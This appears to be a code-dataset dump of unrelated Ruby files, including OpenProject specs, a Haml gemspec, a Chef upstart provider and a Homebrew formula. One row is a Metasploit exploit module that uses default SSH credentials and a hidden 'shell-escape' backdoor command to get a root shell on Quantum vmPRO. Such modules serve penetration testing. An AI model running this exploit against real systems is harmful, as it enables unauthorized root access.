hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
62b554bf5f2e610b6d4fcc70e1dcf885719a125a | 53 | module InvoicePrinter
VERSION = '2.2.0.alpha2'
end
| 13.25 | 26 | 0.735849 |
ac460cc21c919ea94c8f0e609c59881a6d4eed13 | 3,585 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2015 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
# FIXME: deprecate this example and replace by 'has an untitled action link'
# it does not work as intended (setting user has no effect, but by chance :role overrides base spec)
# it does not check the actual href/method
shared_examples_for 'action link' do
let(:role) { FactoryGirl.create(:role, permissions: [:view_work_packages, :edit_work_packages]) }
let(:user) {
FactoryGirl.create(:user, member_in_project: project,
member_through_role: role)
}
let(:href) { nil }
before do login_as(user) end
it { expect(subject).not_to have_json_path("_links/#{action}/href") }
describe 'with permission' do
before do
role.permissions << permission
role.save!
end
it { expect(subject).to have_json_path("_links/#{action}/href") }
it do
if href
expect(subject).to be_json_eql(href.to_json).at_path("_links/#{action}/href")
end
end
end
end
shared_examples_for 'has an untitled action link' do
it_behaves_like 'has an untitled link'
it 'indicates the desired method' do
is_expected.to be_json_eql(method.to_json).at_path("_links/#{link}/method")
end
describe 'without permission' do
let(:permissions) { all_permissions - [permission] }
it_behaves_like 'has no link'
end
end
shared_examples_for 'has a titled link' do
it { is_expected.to be_json_eql(href.to_json).at_path("_links/#{link}/href") }
it { is_expected.to be_json_eql(title.to_json).at_path("_links/#{link}/title") }
end
shared_examples_for 'has an untitled link' do
it { is_expected.to be_json_eql(href.to_json).at_path("_links/#{link}/href") }
it { is_expected.not_to have_json_path("_links/#{link}/title") }
end
shared_examples_for 'has a templated link' do
it { is_expected.to be_json_eql(href.to_json).at_path("_links/#{link}/href") }
it { is_expected.to be_json_eql(true.to_json).at_path("_links/#{link}/templated") }
end
shared_examples_for 'has an empty link' do
it { is_expected.to be_json_eql(nil.to_json).at_path("_links/#{link}/href") }
it 'has no embedded resource' do
is_expected.not_to have_json_path("_embedded/#{link}")
end
end
shared_examples_for 'has no link' do
it { is_expected.not_to have_json_path("_links/#{link}") }
it 'has no embedded resource' do
is_expected.not_to have_json_path("_embedded/#{link}")
end
end
| 33.504673 | 100 | 0.728312 |
91e9fc7eaef1f904353f6213ae02600bebf7c84a | 196 | class MealSerializer < ActiveModel::Serializer
attributes :id, :date, :calories, :carbohydrates, :fat, :protein,
:carbohydrates_percentage, :fat_percentage, :protein_percentage
end
| 39.2 | 76 | 0.744898 |
ac2a5674a36064f28fe41be533f555f192c6b382 | 3,618 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Quantum vmPRO Backdoor Command',
'Description' => %q{
This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin
privileges, can get access to the restricted SSH shell. By using the hidden backdoor
"shell-escape" command it's possible to drop to a real root bash shell. This module
has been tested successfully on Quantum vmPRO 3.1.2.
},
'License' => MSF_LICENSE,
'Author' => [
'xistence <xistence[at]0x90.nl>' # Original discovery and Metasploit module
],
'References' => [
['PACKETSTORM', '125760']
],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [
['Quantum vmPRO 3.1.2', {}],
],
'Privileged' => true,
'DisclosureDate' => '2014-03-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)
register_options(
[
Opt::RHOST(),
Opt::RPORT(22),
OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),
OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user, pass)
opts = ssh_client_defaults.merge({
auth_methods: ['password', 'keyboard-interactive'],
port: rport,
password: pass
})
opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, user, opts)
end
rescue Rex::ConnectionError
return nil
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return nil
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return nil
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return nil
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, 'shell-escape')
return conn
end
return nil
end
def exploit
user = datastore['USER']
pass = datastore['PASS']
print_status("#{rhost}:#{rport} - Attempt to login...")
conn = do_login(user, pass)
if conn
print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
handler(conn.lsock)
end
end
end
| 27.409091 | 102 | 0.576562 |
bb706d290302faa61f084d0cde472e7e7d527af1 | 2,225 | module Common
class RegisteredOrganisationResponse
def initialize(ccs_org_id, hidden: true)
super()
@ccs_org_id = ccs_org_id
@results = hidden.blank? ? search_organisation : search_organisation_all
@primary_name = ''
@primary_identifier = {}
@additional_identifier = []
end
def search_organisation
OrganisationSchemeIdentifier.select(:scheme_org_reg_number, :scheme_code, :primary_scheme, :uri, :legal_name).where(ccs_org_id: @ccs_org_id).where(hidden: false)
end
def search_organisation_all
OrganisationSchemeIdentifier.select(:scheme_org_reg_number, :scheme_code, :primary_scheme, :hidden, :uri, :legal_name).where(ccs_org_id: @ccs_org_id)
end
def response_payload
build_response
[
identifier: @primary_identifier,
additionalIdentifiers: @additional_identifier
]
end
def build_response
@results.each do |result|
build_response_structure(result)
end
end
def build_response_structure(result)
@primary_identifier = indetifier_primary_scheme(result) if result.primary_scheme
@additional_identifier.push(indetifier_scheme(result)) unless result.primary_scheme
end
def primary_scheme_name(indetifier)
indetifier.legal_name.present? ? indetifier.legal_name : ''
end
def indetifier_primary_scheme(indetifier)
{
scheme: indetifier.scheme_code,
id: indetifier.scheme_org_reg_number,
legalName: legal_name(indetifier),
uri: uri(indetifier)
}
end
def indetifier_scheme(indetifier)
scheme_indetifier = {
scheme: indetifier.scheme_code,
id: indetifier.scheme_org_reg_number,
legalName: legal_name(indetifier),
uri: uri(indetifier)
}
scheme_indetifier[:hidden] = hidden_status(indetifier) if indetifier.attributes.key?('hidden')
scheme_indetifier
end
def hidden_status(indetifier)
indetifier.hidden ? true : false
end
def legal_name(indetifier)
indetifier.legal_name.present? ? indetifier.legal_name : ''
end
def uri(indetifier)
indetifier.uri.present? ? indetifier.uri : ''
end
end
end
| 28.525641 | 167 | 0.697528 |
62a14f0a18cd90b87cbcca23811850949e4dac07 | 1,799 | require 'rubygems'
# Note that Haml's gem-compilation process requires access to the filesystem.
# This means that it cannot be automatically run by e.g. GitHub's gem system.
# However, a build server automatically packages the master branch
# every time it's pushed to; this is made available as the haml-edge gem.
HAML_GEMSPEC = Gem::Specification.new do |spec|
spec.rubyforge_project = 'haml'
spec.name = File.exist?(File.dirname(__FILE__) + '/EDGE_GEM_VERSION') ? 'haml-edge' : 'haml'
spec.summary = "An elegant, structured XHTML/XML templating engine.\nComes with Sass, a similar CSS templating engine."
spec.version = File.read(File.dirname(__FILE__) + '/VERSION').strip
spec.authors = ['Nathan Weizenbaum', 'Chris Eppstein', 'Hampton Catlin']
spec.email = '[email protected]'
spec.description = <<-END
Haml (HTML Abstraction Markup Language) is a layer on top of XHTML or XML
that's designed to express the structure of XHTML or XML documents
in a non-repetitive, elegant, easy way,
using indentation rather than closing tags
and allowing Ruby to be embedded with ease.
It was originally envisioned as a plugin for Ruby on Rails,
but it can function as a stand-alone templating engine.
END
spec.add_development_dependency 'yard', '>= 0.5.3'
spec.add_development_dependency 'maruku', '>= 0.5.9'
readmes = Dir['*'].reject{ |x| x =~ /(^|[^.a-z])[a-z]+/ || x == "TODO" }
spec.executables = ['haml', 'html2haml', 'sass', 'css2sass', 'sass-convert']
spec.files = Dir['rails/init.rb', 'lib/**/*', 'vendor/fssm/**/*',
'bin/*', 'test/**/*', 'extra/**/*', 'Rakefile', 'init.rb',
'.yardopts'] + readmes
spec.homepage = 'http://haml-lang.com/'
spec.has_rdoc = false
spec.test_files = Dir['test/**/*_test.rb']
end
| 49.972222 | 121 | 0.685937 |
26f575c12989a45b1277a4091ab9eaf42cfdfc81 | 5,957 | =begin
#rokka.io
#digital image processing done right. [Documentation](https://rokka.io/documentation). [Changelog](https://api.rokka.io/changelog.md).
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.3.1
=end
require 'date'
module RokkaClientCodegen
class User
attr_accessor :id
# Can be changed (v2)
attr_accessor :email
attr_accessor :api_key
attr_accessor :api_secret
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'id' => :'id',
:'email' => :'email',
:'api_key' => :'api_key',
:'api_secret' => :'api_secret'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'id' => :'String',
:'email' => :'String',
:'api_key' => :'String',
:'api_secret' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'email')
self.email = attributes[:'email']
end
if attributes.has_key?(:'api_key')
self.api_key = attributes[:'api_key']
end
if attributes.has_key?(:'api_secret')
self.api_secret = attributes[:'api_secret']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
id == o.id &&
email == o.email &&
api_key == o.api_key &&
api_secret == o.api_secret
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[id, email, api_key, api_secret].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = RokkaClientCodegen.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 27.451613 | 134 | 0.605842 |
1c1df771995a6ee59a713a4dfb2d2710c678433d | 1,992 | class PlaceTaxonName < ActiveRecord::Base
belongs_to :place, :inverse_of => :place_taxon_names
belongs_to :taxon_name, :inverse_of => :place_taxon_names
validates_uniqueness_of :place_id, :scope => :taxon_name_id
validates_presence_of :place_id, :taxon_name_id
def to_s
"<PlaceTaxonName #{id}, place_id: #{place_id}, taxon_name_id: #{taxon_name_id}>"
end
#
# Create PlaceTaxonNames for matching countries. This helps people who
# cannot choose a locale that matches a lexicon but can choose a place.
#
def self.create_country_records_from_lexicons(options = {})
start = Time.now
logger = options[:logger] || Rails.logger
created = 0
errors = 0
mapping = options[:mapping] || {
Japanese: [:Japan],
German: [:Germany, :Austria],
chinese_traditional: ['Hong Kong', :Taiwan],
chinese_simplified: [:China]
}
mapping.each do |lexicon, country_names|
countries = Place.where(admin_level: Place::COUNTRY_LEVEL, name: country_names).to_a
TaxonName.joins("LEFT OUTER JOIN place_taxon_names ptn ON ptn.taxon_name_id = taxon_names.id").
includes(:place_taxon_names).
where("taxon_names.lexicon = ?", lexicon).find_each do |tn|
# not a fan of the overselection and filter approach here, since we have a lot of names. Is there a way to do this in the db?
candidate_countries = countries.select{|c| !tn.place_ids.include?(c.id)}
next if candidate_countries.blank?
candidate_countries.each do |country|
ptn = PlaceTaxonName.new(taxon_name: tn, place: country)
if ptn.save
logger.info "Added #{tn} to #{country}"
created += 1
else
logger.error "[ERROR] Failed to save #{ptn}: #{ptn.errors.full_messages.to_sentence}"
errors += 1
end
end
end
end
logger.info "Created #{created} PlaceTaxonName records, failed on #{errors} (#{Time.now - start}s)"
end
end
| 40.653061 | 133 | 0.666165 |
4a4ab15205a6dd60f6bf699f99bc6a81aac30bef | 591 | # frozen_string_literal: true
module ElasticAPM
# @api private
module Spies
# @api private
class ActionDispatchSpy
def install
::ActionDispatch::ShowExceptions.class_eval do
alias render_exception_without_apm render_exception
def render_exception(env, exception)
ElasticAPM.report(exception)
render_exception_without_apm env, exception
end
end
end
end
register(
'ActionDispatch::ShowExceptions',
'action_dispatch/show_exception',
ActionDispatchSpy.new
)
end
end
| 21.888889 | 61 | 0.663283 |
ac12190bea0aee08574e3d552c30d1640671a847 | 1,245 | # typed: false
# frozen_string_literal: true
# :nodoc:
class BbeditCli < Formula
desc "BBEdit Command-Line Tools"
homepage "https://www.barebones.com/products/bbedit/index.html"
url "https://github.com/josh/homebrew-tap/raw/4b9c17f996fd897382ad812a472a551d116f7172/empty.tar"
version "0.1.0"
sha256 "9bfac43f415467832a8470a10da79435da99c950cd20b7fae458eb2144f0ff7a"
livecheck do
skip "Unsupported"
end
conflicts_with cask: "bbedit"
def install
bin.install_symlink "/Applications/BBEdit.app/Contents/Helpers/bbedit_tool" => "bbedit"
bin.install_symlink "/Applications/BBEdit.app/Contents/Helpers/bbdiff" => "bbdiff"
bin.install_symlink "/Applications/BBEdit.app/Contents/Helpers/bbfind" => "bbfind"
bin.install_symlink "/Applications/BBEdit.app/Contents/Helpers/bbresults" => "bbresults"
man1.install_symlink "/Applications/BBEdit.app/Contents/Resources/bbedit.1" => "bbedit.1"
man1.install_symlink "/Applications/BBEdit.app/Contents/Resources/bbdiff.1" => "bbdiff.1"
man1.install_symlink "/Applications/BBEdit.app/Contents/Resources/bbfind.1" => "bbfind.1"
man1.install_symlink "/Applications/BBEdit.app/Contents/Resources/bbresults.1" => "bbresults.1"
end
test do
42
end
end
| 37.727273 | 99 | 0.759839 |
e2e197a4b5628fc46582edd00ed56b3755cb3b2c | 270 | class Forest::Error < StandardError
attr_reader :object
def initialize(msg= 'Forest::Error', object = nil)
@object = object
super msg
end
end
# begin
# raise MyError.new("my message", "my thing")
# rescue => e
# puts e.thing # "my thing"
# end
# end
| 16.875 | 52 | 0.644444 |
edd41dba7e67be36519837a8b8c413314232890a | 9,565 | #
# Author:: Bryan McLellan <[email protected]>
# Copyright:: Copyright 2010-2016, Bryan McLellan
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "chef/resource/service"
require "chef/provider/service/simple"
require "chef/mixin/command"
require "chef/util/file_edit"
class Chef
class Provider
class Service
class Upstart < Chef::Provider::Service::Simple
provides :service, platform_family: "debian", override: true do |node|
Chef::Platform::ServiceHelpers.service_resource_providers.include?(:upstart)
end
UPSTART_STATE_FORMAT = /\S+ \(?(start|stop)?\)? ?[\/ ](\w+)/
def self.supports?(resource, action)
Chef::Platform::ServiceHelpers.config_for_service(resource.service_name).include?(:upstart)
end
# Upstart does more than start or stop a service, creating multiple 'states' [1] that a service can be in.
# In chef, when we ask a service to start, we expect it to have started before performing the next step
# since we have top down dependencies. Which is to say we may follow witha resource next that requires
# that service to be running. According to [2] we can trust that sending a 'goal' such as start will not
# return until that 'goal' is reached, or some error has occurred.
#
# [1] http://upstart.ubuntu.com/wiki/JobStates
# [2] http://www.netsplit.com/2008/04/27/upstart-05-events/
def initialize(new_resource, run_context)
# TODO: re-evaluate if this is needed after integrating cookbook fix
raise ArgumentError, "run_context cannot be nil" unless run_context
super
run_context.node
# dup so we can mutate @job
@job = @new_resource.service_name.dup
if @new_resource.parameters
@new_resource.parameters.each do |key, value|
@job << " #{key}=#{value}"
end
end
platform, version = Chef::Platform.find_platform_and_version(run_context.node)
if platform == "ubuntu" && (8.04..9.04).include?(version.to_f)
@upstart_job_dir = "/etc/event.d"
@upstart_conf_suffix = ""
else
@upstart_job_dir = "/etc/init"
@upstart_conf_suffix = ".conf"
end
@command_success = true # new_resource.status_command= false, means upstart used
@config_file_found = true
@upstart_command_success = true
end
def define_resource_requirements
# Do not call super, only call shared requirements
shared_resource_requirements
requirements.assert(:all_actions) do |a|
if !@command_success
whyrun_msg = @new_resource.status_command ? "Provided status command #{@new_resource.status_command} failed." :
"Could not determine upstart state for service"
end
a.assertion { @command_success }
# no failure here, just document the assumptions made.
a.whyrun "#{whyrun_msg} Assuming service installed and not running."
end
requirements.assert(:all_actions) do |a|
a.assertion { @config_file_found }
# no failure here, just document the assumptions made.
a.whyrun "Could not find #{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}. Assuming service is disabled."
end
end
def load_current_resource
@current_resource = Chef::Resource::Service.new(@new_resource.name)
@current_resource.service_name(@new_resource.service_name)
# Get running/stopped state
# We do not support searching for a service via ps when using upstart since status is a native
# upstart function. We will however support status_command in case someone wants to do something special.
if @new_resource.status_command
Chef::Log.debug("#{@new_resource} you have specified a status command, running..")
begin
if shell_out!(@new_resource.status_command).exitstatus == 0
@current_resource.running true
end
rescue
@command_success = false
@current_resource.running false
nil
end
else
begin
if upstart_state == "running"
@current_resource.running true
else
@current_resource.running false
end
rescue Chef::Exceptions::Exec
@command_success = false
@current_resource.running false
nil
end
end
# Get enabled/disabled state by reading job configuration file
if ::File.exists?("#{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
Chef::Log.debug("#{@new_resource} found #{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
::File.open("#{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}", "r") do |file|
while line = file.gets
case line
when /^start on/
Chef::Log.debug("#{@new_resource} enabled: #{line.chomp}")
@current_resource.enabled true
break
when /^#start on/
Chef::Log.debug("#{@new_resource} disabled: #{line.chomp}")
@current_resource.enabled false
break
end
end
end
else
@config_file_found = false
Chef::Log.debug("#{@new_resource} did not find #{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
@current_resource.enabled false
end
@current_resource
end
def start_service
# Calling start on a service that is already started will return 1
# Our 'goal' when we call start is to ensure the service is started
if @current_resource.running
Chef::Log.debug("#{@new_resource} already running, not starting")
else
if @new_resource.start_command
super
else
shell_out_with_systems_locale!("/sbin/start #{@job}")
end
end
end
def stop_service
# Calling stop on a service that is already stopped will return 1
# Our 'goal' when we call stop is to ensure the service is stopped
unless @current_resource.running
Chef::Log.debug("#{@new_resource} not running, not stopping")
else
if @new_resource.stop_command
super
else
shell_out_with_systems_locale!("/sbin/stop #{@job}")
end
end
end
def restart_service
if @new_resource.restart_command
super
# Upstart always provides restart functionality so we don't need to mimic it with stop/sleep/start.
# Older versions of upstart would fail on restart if the service was currently stopped, check for that. LP:430883
else
if @current_resource.running
shell_out_with_systems_locale!("/sbin/restart #{@job}")
else
start_service
end
end
end
def reload_service
if @new_resource.reload_command
super
else
# upstart >= 0.6.3-4 supports reload (HUP)
shell_out_with_systems_locale!("/sbin/reload #{@job}")
end
end
# https://bugs.launchpad.net/upstart/+bug/94065
def enable_service
Chef::Log.debug("#{@new_resource} upstart lacks inherent support for enabling services, editing job config file")
conf = Chef::Util::FileEdit.new("#{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
conf.search_file_replace(/^#start on/, "start on")
conf.write_file
end
def disable_service
Chef::Log.debug("#{@new_resource} upstart lacks inherent support for disabling services, editing job config file")
conf = Chef::Util::FileEdit.new("#{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
conf.search_file_replace(/^start on/, "#start on")
conf.write_file
end
def upstart_state
command = "/sbin/status #{@job}"
status = popen4(command) do |pid, stdin, stdout, stderr|
stdout.each_line do |line|
# service goal/state
# OR
# service (instance) goal/state
# OR
# service (goal) state
line =~ UPSTART_STATE_FORMAT
data = Regexp.last_match
return data[2]
end
end
end
end
end
end
end
| 39.36214 | 141 | 0.603659 |
875ea6fbbaf134e291c9bbe925f37dbd45c87305 | 133 | class MixTask < Task
def initialize
super('Mix that batter up!')
end
def get_time_required
3.0 # Mix for 3 minutes
end
end | 14.777778 | 30 | 0.706767 |
1c3d3a31b8eac0196995f9b7cb09c19041fce422 | 1,751 | # frozen_string_literal: true
require 'cuprum/collections/basic/commands/update_one'
require 'cuprum/collections/basic/query'
require 'cuprum/collections/basic/rspec/command_contract'
require 'cuprum/collections/rspec/update_one_command_contract'
require 'support/examples/basic_command_examples'
RSpec.describe Cuprum::Collections::Basic::Commands::UpdateOne do
include Spec::Support::Examples::BasicCommandExamples
include_context 'with parameters for a basic contract'
subject(:command) do
described_class.new(
collection_name: collection_name,
data: mapped_data,
**constructor_options
)
end
let(:attributes) do
{
id: 0,
title: 'Gideon the Ninth',
author: 'Tammsyn Muir'
}
end
let(:entity) do
tools.hash_tools.convert_keys_to_strings(attributes)
end
let(:query) do
Cuprum::Collections::Basic::Query.new(mapped_data)
end
let(:expected_data) do
tools.hash_tools.convert_keys_to_strings(matching_data)
end
def tools
SleepingKingStudios::Tools::Toolbelt.instance
end
describe '.new' do
it 'should define the constructor' do
expect(described_class)
.to respond_to(:new)
.with(0).arguments
.and_keywords(:collection_name, :data)
.and_any_keywords
end
end
include_contract Cuprum::Collections::Basic::RSpec::COMMAND_CONTRACT
include_contract Cuprum::Collections::RSpec::UPDATE_ONE_COMMAND_CONTRACT
wrap_context 'with a custom primary key' do
let(:attributes) do
super()
.tap { |hsh| hsh.delete(:id) }
.merge(uuid: '00000000-0000-0000-0000-000000000000')
end
include_contract Cuprum::Collections::RSpec::UPDATE_ONE_COMMAND_CONTRACT
end
end
| 25.75 | 76 | 0.717304 |
e264c079c835ad18780b4e4bada1e48d58eac5dc | 5,832 | require 'rubygems'
require 'help/remote_command_handler'
require 'help/state_change_listener'
require 'scripts/ec2/copy_mswindows_ami'
require 'AWS'
module SecludIT
module CloudyScripts
class AwsEc2Helper
#XXX: retrieve a getting-started-with-ebs-boot AMI of Amazon according to Amazon Region
def self.get_starter_ami(region)
map = {'us-east-1.ec2.amazonaws.com' => 'ami-b232d0db',
'us-west-1.ec2.amazonaws.com' => 'ami-813968c4',
'eu-west-1.ec2.amazonaws.com' => 'ami-df1e35ab',
'ap-southeast-1.ec2.amazonaws.com' => 'ami-99f58acb',
'ap-northeast-1.ec2.amazonaws.com' => 'ami-2e08a32f'
}
if map[region] == nil
raise Exception.new("region not supported")
end
map[region]
end
#XXX: Basic 32-bit Amazon Linux AMI 2011.02.1 Beta
def self.get_basic_aws_linux_ami_old(region)
map = {'us-east-1.ec2.amazonaws.com' => 'ami-09ab6d60', #'ami-8c1fece5',
'us-west-1.ec2.amazonaws.com' => 'ami-17eebc52', #'ami-3bc9997e',
'eu-west-1.ec2.amazonaws.com' => 'ami-940030e0', #'ami-47cefa33',
'ap-southeast-1.ec2.amazonaws.com' => 'ami-cec9b19c', #'ami-6af08e38',
'ap-northeast-1.ec2.amazonaws.com' => 'ami-96b50097' #'ami-300ca731'
}
if map[region] == nil
raise Exception.new("region not supported")
end
map[region]
end
# Public CloudyScripts AMI: Basic 32-bit Amazon Linux AMI 2011.02.1 Beta
# XXX: Update on 11/11/2011 based on
# - Basic 32-bit Amazon Linux AMI 2011.09 (amazon/amzn-ami-2011.09.2.i386-ebs)
def self.get_basic_aws_linux_ami(region)
map = {'us-east-1.ec2.amazonaws.com' => 'ami-23f53c4a', #'ami-09ab6d60', #'ami-8c1fece5',
'us-west-1.ec2.amazonaws.com' => 'ami-013a6544', #'ami-17eebc52', #'ami-3bc9997e',
'us-west-2.ec2.amazonaws.com' => 'ami-42f77a72',
'eu-west-1.ec2.amazonaws.com' => 'ami-f3c3fe87', #'ami-940030e0', #'ami-47cefa33',
'ap-southeast-1.ec2.amazonaws.com' => 'ami-b4f18be6', #'ami-cec9b19c', #'ami-6af08e38',
'ap-northeast-1.ec2.amazonaws.com' => 'ami-8a07b38b', #'ami-96b50097' #'ami-300ca731'
'sa-east-1.ec2.amazonaws.com' => 'ami-1e34eb03'
}
if map[region] == nil
raise Exception.new("region not supported")
end
map[region]
end
end
class StateChangeListenerSample < StateChangeListener
def state_changed(state)
puts "state change notification: new state = #{state.to_s} #{state.done? ? '(terminated)' : ''}"
end
def new_message(message, level = Logger::DEBUG)
puts "#{level}: new progress message = #{message}"
end
end
class CopyMsWindowsAmiSampleCode
def self.run()
aws_access_key = "MyAccessKey" # Your AWS access key
aws_secret_key = "MySecretKey" # Your AWS secret key
aws_source_endpoint = "us-east-1.ec2.amazonaws.com"
aws_source_region = "us-east-1.ec2.amazonaws.com"
source_ssh_user = "ec2-user"
source_ssh_key_file = "/root/secludit_keys/secludit_us_east.pem"
source_ssh_key_name = "secludit_us_east"
# sample: Microsoft Windows Server 2008 Base
aws_ami_id = "ami-7dd60314" # Your EC2 AMI to Copy
#aws_helper_ami_id = "ami-ed3768a8" # AMI in the target region of the same type of the one been converted from the source region
aws_helper_ami_id = "ami-863be49b"
#aws_target_endpoint = "us-west-1.ec2.amazonaws.com"
aws_target_endpoint = "sa-east-1.ec2.amazonaws.com"
aws_target_region = "sa-east-1.ec2.amazonaws.com"
target_ssh_user = "ec2-user"
target_ssh_key_file = "/root/secludit_keys/secludit_sa_east_1.pem"
target_ssh_key_name = "secludit_sa_east_1"
new_ami_name = "CloudyScripts MS Windows AMI copy"
new_ami_description = "Copy of MS Windows AMI #{aws_ami_id} from AWS US-East-1 to SA-East-1"
source_ec2_api = AWS::EC2::Base.new(:access_key_id => aws_access_key, :secret_access_key => aws_secret_key, :server => aws_source_endpoint)
target_ec2_api = AWS::EC2::Base.new(:access_key_id => aws_access_key, :secret_access_key => aws_secret_key, :server => aws_target_endpoint)
ssh = RemoteCommandHandler.new()
